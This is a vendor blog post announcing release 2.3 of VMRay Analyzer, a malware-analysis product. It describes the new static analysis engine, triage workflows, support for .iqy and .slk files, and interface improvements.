At the core of VMRay Analyzer is our dynamic analysis engine. Built on an agentless hypervisor-based approach, it delivers unparalleled detection efficacy and evasion resistance. In Version 2.0, we added a rapid reputation engine allowing malware analysts and incident response (DFIR) professionals to quickly identify not only known threats but also known benign files and URLs. In our latest release (v2.3), we’ve continued to bolster the performance with a static analysis engine, which will complement the existing dynamic analysis and reputation engines and support an even higher analysis throughput. In this blogpost, we will discuss the new static analysis engine and some other new features added in VMRay Analyzer v2.3
Superior Performance with Static Analysis
Static analysis complements dynamic analysis in a number of ways. It is an extremely efficient analysis method: Suspicious or malicious files can be flagged in a matter of seconds by extracting metadata and embedded objects as well as deobfuscating active code such as MS Office macros. The performance and efficiency offered by static analysis is critical when a large number of files needs to be analyzed. In addition to performance benefits, static analysis also enriches the malware analysis process in certain cases. As an example, some exploits may not be detected by dynamic analysis if they are not run in the environment which they are designed to attack. When used together, Static and Dynamic analysis techniques provide a comprehensive platform for malware analysis.
VMRay Analyzer v2.3 incorporates a built-in static analysis engine for executables, MS Office and PDF files which extracts:
- Embedded files and URLs
- Metadata such as PE imports/exports, compile time, document author, title etc.
- Active code (Office macros, PDF JavaScript) and related trigger events such as document open, button click etc.
In addition, the static analysis engine also performs basic MS Office macro deobfuscation.
VMRay Analyzer’s reputation engine and static analyzer complement its dynamic analysis engine by providing their own severity scores for a file.
Figure 1: Malicious file detected and scored by VMRay’s reputation service, dynamic analyzer and static analyzer
Static Analysis Report
Static VTI detection rules are applied to the analyzed file or executable and an individual analysis report is presented to the user.
In addition, built-in (or user-defined) Yara rules are matched against the sample and all embedded file and data objects extracted by the static analysis. These rules flag:
- Exploits for known vulnerabilities
- Known malware signatures
- Other anomalies or suspicious patterns
A Static Analysis score on a scale of 0 to 100 is also assigned to the file.
Figure 2: Screenshot of Static Analysis Report
Triaging for Improved Performance
Triaging allows users to optimize performance by defining the analysis workflow for a submitted file. As I mentioned earlier, it allows for a higher throughput and a larger volume of analyses to be completed in a given amount of time.
In VMRay Analyzer v2.3, users can choose a number of workflow combinations involving reputation lookups, static analysis and dynamic analysis. The most comprehensive analysis workflow or ‘Analyzer Mode’ involves using all three techniques as shown in the figure below.
Figure 3: Analyzer mode involving reputation lookup, static analysis and dynamic analysis
The following Analyzer Modes are available and can be configured in the web interface:
- Only perform reputation lookup
- Only perform static analysis
- Only perform reputation lookup and static analysis
- Only perform static analysis and dynamic analysis
- Perform reputation lookup, static analysis and dynamic analysis
Triaging stops the analyzer workflow when a clean file is encountered i.e. if the reputation lookup provides a ‘Whitelisted’ verdict or if the static analysis score is 0/100. The obvious benefit associated with triaging is performance – reputation and static analysis results are usually returned in a matter of seconds. As a result, analysis throughput is significantly higher. Given the amount of email and internet traffic that most organizations have to analyze today, this is a very significant benefit.
Support for New File Types
In recent weeks, a new attack technique was uncovered in which malware authors were using Excel Web Query or .iqy file attachments to trick users into downloading and running malicious scripts via Excel. Several spam campaigns disguised as ‘Unpaid Invoice’ alerts emerged where attackers used this file type to bypass AVs and infect victims with a remote access trojan.
Another technique that was also uncovered recently was the use of Symbolic Link files or .slk files to infect computers.
VMRay Analyzer v2.3 has added analysis support for both .iqy and .slk file types. We recently published a .iqy file analysis report along with details about the kill chain on Twitter.
Improved User Experience
In a recently published review of VMRay Analyzer, Matt Bromiley of the SANS Institute said:
“One of the most common issues that many incident responders encounter when incorporating a tool into their workflow is ease of use versus analytical capabilities. How they are balanced can determine whether an organization fully adopts a tool.”
An excellent user experience is vital for incident responders and DFIR specialists to be effective in their roles. We’ve continued to improve our user experience in v2.3 with the following improvements:
Simplified Submission Process
When a file is submitted via the VMRay Analyzer 2.3 web interface, users can toggle between basic and advanced versions of the submission screen. While the advanced submission screen offers several customization options such as network configuration, command line arguments, prescripts, analyzer mode and triaging mode, the simplified screen is clean and only displays the basic options such as environments in which the analysis should be performed, available external analyzers (if desired), tags and comments.
Figure 4: Simplified submission screen
Figure 5: Advanced submission screen
Account Manager Role for Cloud Customers
Cloud users designated as ‘Account Managers’ can now invite new users from their organization to join the VMRay Cloud service. Account managers can also enable/disable specific user accounts in their organization as appropriate.
Improved Email Notifications
Email notifications have been significantly improved in v2.3. After an analysis has been completed, a summary of the analysis results is sent to the user.
Figure 6: Email Notification with a summary of analysis results
Additional Features
There are several other improvements baked into VMRay Analyzer v2.3. These include:
- improved network analysis
- new and improved anti-evasion features
- new and improved VTI (VMRay Threat Identifier) detection rules
- improved built-in YARA rulesets and additional sections in the analysis reports.
For VMRay customers a complete list of the new features is available in the product documentation.
Want to get hands-on with VMRay Analyzer v2.3? Click here to start your trial.
